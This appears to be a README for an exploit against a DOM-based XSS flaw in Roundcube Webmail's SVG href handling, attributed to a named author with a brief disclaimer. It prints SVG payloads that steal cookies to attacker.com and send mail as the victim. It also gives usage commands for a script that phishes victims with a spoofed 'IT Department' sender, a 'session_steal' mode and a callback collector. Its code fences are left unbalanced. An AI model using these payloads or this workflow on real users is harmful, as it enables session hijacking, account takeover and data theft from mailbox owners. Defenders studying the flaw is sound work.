# CVE-2026-25916: Roundcube Webmail DOM XSS Exploit

## 📋 Exploit Information
**Exploit Title:** Roundcube Webmail DOM XSS via SVG href (CVE-2026-25916)  
**Author:** Mohammed Idrees Banyamer  
**Contact:** [GitHub @mbanyamer](https://github.com/mbanyamer) | [Instagram @banyamer_security](https://instagram.com/banyamer_security)  
**Country:** Jordan  
**Date:** February 9, 2026  
**CVE:** CVE-2026-25916  
**Type:** DOM-based Cross-Site Scripting (XSS)  
**Platform:** Web Application  
**Tested on:** Roundcube 1.6.8, Ubuntu 22.04  
**CVSS Score:** 6.1 (Medium)  

## 🚨 Legal Disclaimer
> **⚠️ WARNING:** This exploit is for **educational and authorized testing purposes only**.  
> Use only on systems you own or have explicit written permission to test.  
> The author is not responsible for any misuse or illegal activities.

## 📖 Vulnerability Description
Roundcube Webmail versions before 1.6.9 contain a DOM-based XSS vulnerability in SVG handling. The application fails to properly sanitize `href` and `xlink:href` attributes in SVG elements, allowing JavaScript execution via specially crafted emails.

**Affected Versions:** Roundcube Webmail < 1.6.9  
**Fixed in:** Version 1.6.9 (Commit 26d7677)  
**CWE:** CWE-79 - Improper Neutralization of Input During Web Page Generation  
**Attack Vector:** Remote via email  
**Impact:** Session Hijacking, Account Takeover, Data Exfiltration

## 🔧 Technical Details
The vulnerability exists in `rcube_washtml.php` where `href` attributes in SVG elements were not properly validated:

```html
<!-- Vulnerable SVG elements -->
<use href="javascript:alert(document.cookie)">
<image xlink:href="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">
<a xlink:href="javascript:fetch('/?_task=mail&_action=send',{method:'POST',body:'to=attacker@evil.com'})">

```bash
python3 cve-2026-25916.py -s smtp.gmail.com -p 587 -u your_email@gmail.com -w your_password -r victim@company.com
```
```bash
python3 cve-2026-25916.py \
  -s smtp.gmail.com \
  -p 587 \
  -u attacker@gmail.com \
  -w app_password \
  -r victim@company.com \
  -t session_steal \
  --callback https://yourserver.com/collect \
  --subject "Security Alert" \
  --from-name "IT Department"
